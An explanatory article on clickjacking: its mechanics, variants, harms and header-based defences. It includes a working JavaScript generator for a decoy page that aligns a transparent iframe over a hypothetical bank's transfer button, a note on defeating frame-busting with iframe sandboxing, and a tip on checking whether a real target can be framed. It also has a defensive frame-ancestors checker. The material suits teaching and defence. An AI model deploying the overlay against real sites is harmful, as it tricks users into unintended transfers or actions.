Clickjacking, also known as user-interface (UI) redressing or iframe overlay, is an attack in which the attacker tricks a user into clicking on something other than what the user believes they are clicking. Typically the attacker loads a legitimate page, on which the victim is already logged in, inside an invisible iframe and positions it over a decoy page, so a click on a harmless-looking button actually lands on a button of the hidden page. Depending on what that button does, the user unknowingly authorises an action, changes a setting, reveals sensitive information, or starts a download.
Robert Hansen and Jeremiah Grossman coined the term in 2008. Since then, browser vendors and websites have recognised the problem and put mechanisms in place to fight it.
How does clickjacking work?
The attacker builds a page that embeds the target site in an iframe, makes that iframe transparent (for example with CSS opacity: 0) and layers it over a decoy. The decoy is what the user sees; the iframe is what receives the click. An iframe (inline frame) is an HTML element that loads one HTML document inside another; think of it as a browser window packed inside the web page. Because the framed page is loaded by the victim's own browser, it can arrive with the victim's session, so the click is performed as the victim. Note that the framed page itself is not malicious: it is the real site, and the attacker only controls what surrounds it and where the user thinks they are clicking.
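The overlay described above, as an added example that is not code from the original article: a small generator for the attacker-side decoy page. It computes the iframe offset that places the target's real button exactly under the decoy button and emits the HTML. The target URL (https://bank.example/transfer), the button coordinates and the frame size are hypothetical; the page only works against a target that sends no anti-framing headers and whose session cookie is sent in a cross-site iframe (SameSite=None).

```javascript
// Added example, not code from the original article. Builds the attacker-side
// decoy page for a classic clickjacking overlay. All URLs, coordinates and sizes
// are hypothetical; https://bank.example/transfer stands in for a page that
// sends no anti-framing headers.

// Given where the real button sits inside the framed page and where the decoy
// button sits on the attacker's page, compute the iframe offset that makes the
// two coincide: the hidden button must render exactly under the decoy.
function alignOffsets(targetButton, decoyButton) {
  return {
    left: decoyButton.x - targetButton.x,
    top: decoyButton.y - targetButton.y,
  };
}

// Emit the decoy page. The iframe is fully transparent but on top (higher
// z-index), so it receives the click; opacity does not affect hit-testing,
// unlike visibility:hidden or pointer-events:none.
function buildOverlayPage({ targetUrl, targetButton, decoyButton, frameSize, opacity = 0 }) {
  const { left, top } = alignOffsets(targetButton, decoyButton);
  return `<!doctype html>
<html><head><meta charset="utf-8"><title>You won a prize!</title>
<style>
  body { margin: 0; position: relative; }
  /* the decoy the victim sees: underneath (lower z-index) */
  #decoy {
    position: absolute; left: ${decoyButton.x}px; top: ${decoyButton.y}px;
    z-index: 1; padding: 12px 24px; font-size: 18px;
  }
  /* the real target: on top but invisible, so the click lands here */
  #target {
    position: absolute; left: ${left}px; top: ${top}px;
    width: ${frameSize.width}px; height: ${frameSize.height}px;
    border: 0; opacity: ${opacity}; z-index: 2;
  }
</style></head>
<body>
  <button id="decoy">Claim prize</button>
  <iframe id="target" src="${targetUrl}"></iframe>
</body></html>`;
}

// Constructed sample input: the "Confirm transfer" button of the hypothetical
// target sits at (300, 400) inside its page; the decoy button is drawn at (120, 80).
const SAMPLE_PAGE = buildOverlayPage({
  targetUrl: 'https://bank.example/transfer',
  targetButton: { x: 300, y: 400 },
  decoyButton: { x: 120, y: 80 },
  frameSize: { width: 1024, height: 768 },
});
```

Setting opacity to 0.5 while developing the page shows both layers at once, which is the usual way to line up the coordinates; the attacker drops it to 0 before serving the page.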
Attackers use several variations to make clickjacking work. Some of them are listed below.
- Injecting the framing or overlay markup directly into a site the victim already trusts, for example through a Cross-Site Scripting (XSS) vulnerability.
- Setting up an entirely new site under an attractive name that serves the decoy page; when users visit it and click, the hidden frame receives the click or a malware-laden page opens. This requires hosting that the attacker controls.
- Placing an invisible iframe over social-media controls. The classic example is the Facebook Like button ("likejacking"): a click on a harmless-looking element actually presses Like. The same trick works on any platform with a one-click action.
- Following the mouse cursor: positioning the hidden element under the pointer, or offsetting the displayed cursor from the real one ("cursorjacking"), so that wherever the user clicks, the hidden element receives the click.
- Making the iframe visible but disguising it as a legitimate part of the page (UI redressing in the narrow sense).
- Posting links to the decoy page on social media platforms such as Facebook and Twitter, where curiosity draws users in. Here social engineering does half the work. Such links may also prompt users to install additional software or plugins, which are, needless to say, harmful.
How can clickjacking harm the device?
That depends entirely on what the framed page lets a logged-in user do with a single click. Attackers have used clickjacking for everything from harvesting Facebook likes to coaxing personal information out of the user, and as a stepping stone for other attacks. In most cases the user sees nothing unusual: the decoy behaves as expected while the real click happens on an invisible layer. The attack relies as much on curiosity and inattention as on any technical trick.
By clickjacking, attackers can harm the user in a host of ways; some of them are as follows:
- Stealing passwords and other confidential information.
- Luring the user into unwanted purchases.
- Downloading malware onto the device.
- Exposing the user's browsing history and preferences.
- Making unauthorised financial transfers.
- Serving as the first step of other attacks, such as phishing or triggering an XSS payload, depending on the attacker's goal.
How to prevent clickjacking attacks?
A host of measures exist to counter clickjacking. The ones that actually stop the attack are response headers sent by the site being framed; the others reduce its impact.
- Send a Content-Security-Policy header with the frame-ancestors directive: `frame-ancestors 'none'` forbids framing altogether, `'self'` allows only the site's own origin, and an explicit list allows chosen partner origins. This is the standard, modern defence, and browsers honour it in preference to X-Frame-Options when both are present.
- Also send `X-Frame-Options: DENY` or `SAMEORIGIN` for older browsers. The `ALLOW-FROM` value is obsolete and ignored by current browsers. Keep the two headers consistent, otherwise behaviour differs from browser to browser.
- Set session cookies with `SameSite=Lax` or `Strict`. A page loaded in a cross-site iframe then arrives without the session, so a hijacked click is not performed as the victim.
- Frame-busting JavaScript (`if (top !== self) top.location = self.location;`) is a legacy fallback only: an attacker can neutralise it with `<iframe sandbox="allow-forms allow-scripts">`, which strips the framed page's permission to navigate the top window, and it does nothing when scripts are disabled.
- Require an explicit confirmation step for sensitive actions so that a single click cannot complete them. A confirmation dialog drawn on the same page can itself be clickjacked, so re-entering a password or typing a confirmation is stronger than a second button. Users can also report suspicious clicks.
- Change the layout of sensitive controls at intervals, so an attacker cannot precompute where to position the overlay. This only raises the attacker's effort.
- Visibility detection on click: newer browsers can tell a page whether an element was actually visible when it was clicked (Chrome's Intersection Observer v2 exposes this), letting the page ignore clicks on obscured elements. The check has to be wired to each specific component and is not supported everywhere, so it supplements rather than replaces the headers above.
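The header-based defences described above, as an added example that is not code from the original article: a function that decides whether a response may be framed by a given origin, applying CSP frame-ancestors first and X-Frame-Options as the fallback, shown against a weak and a hardened header set. The origins bank.example and partner.example are hypothetical, and the host-source matcher is a simplified reading of CSP Level 3 (scheme, host, *.wildcard and port; no path matching and no scheme upgrades).

```javascript
// Added example, not code from the original article. Decides whether a response
// with the given headers may be rendered inside a frame on framerOrigin, applying
// Content-Security-Policy frame-ancestors (honoured in preference to
// X-Frame-Options when both are present) and then X-Frame-Options.
// Assumption: sourceMatches() is a simplified reading of CSP Level 3 host-source
// matching (scheme, host, *.wildcard and port; no path or scheme upgrades).

function defaultPort(scheme) {
  return scheme === 'https' ? '443' : '80';
}

function parseOrigin(origin) {
  const u = new URL(origin);
  const scheme = u.protocol.slice(0, -1);
  return { scheme, host: u.hostname, port: u.port || defaultPort(scheme) };
}

function sameOrigin(a, b) {
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Does one frame-ancestors source expression match the framing origin?
function sourceMatches(source, framer, page) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return sameOrigin(framer, page);
  if (s === '*') return true;
  // scheme-only source such as "https:"
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return framer.scheme === s.slice(0, -1);
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)(?::(\d+|\*))?$/);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  // explicit scheme must match; a scheme-less source inherits the page's scheme
  if (scheme ? scheme !== framer.scheme : framer.scheme !== page.scheme) return false;
  // "*.example.com" matches subdomains only, never the bare domain
  if (wildcard ? !framer.host.endsWith('.' + host) : framer.host !== host) return false;
  if (port === '*') return true;
  return port ? port === framer.port : framer.port === defaultPort(framer.scheme);
}

// Returns the frame-ancestors source list, or null when the directive is absent.
function frameAncestors(headers) {
  const csp = headers['content-security-policy'];
  if (!csp) return null;
  const directive = csp.split(';').map(d => d.trim()).find(d => /^frame-ancestors\b/i.test(d));
  return directive ? directive.split(/\s+/).slice(1) : null;
}

function framingAllowed(rawHeaders, framerOrigin, pageOrigin) {
  const headers = {};
  for (const [k, v] of Object.entries(rawHeaders)) headers[k.toLowerCase()] = v;
  const framer = parseOrigin(framerOrigin);
  const page = parseOrigin(pageOrigin);

  const sources = frameAncestors(headers);
  // an empty source list behaves like 'none'
  if (sources) return sources.some(src => sourceMatches(src, framer, page));

  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return sameOrigin(framer, page);
  // ALLOW-FROM is obsolete and ignored by current browsers; with no usable header
  // every site may frame the page, which is the clickjacking precondition.
  return true;
}

// Weak configuration: no anti-framing header at all.
const WEAK_HEADERS = { 'Content-Type': 'text/html; charset=utf-8' };

// Hardened configuration: CSP for modern browsers, X-Frame-Options as the
// fallback for older ones; the two agree, so behaviour is the same everywhere.
const HARDENED_HEADERS = {
  'Content-Type': 'text/html; charset=utf-8',
  'Content-Security-Policy': "frame-ancestors 'self'",
  'X-Frame-Options': 'SAMEORIGIN',
};
```

Running the same check against the headers a real target actually returns (for instance from `curl -sI`) is a quick way to triage whether a page is frameable before spending time on an overlay, and the `ALLOW-FROM` branch is worth testing explicitly, since that value is still found in production and silently provides no protection.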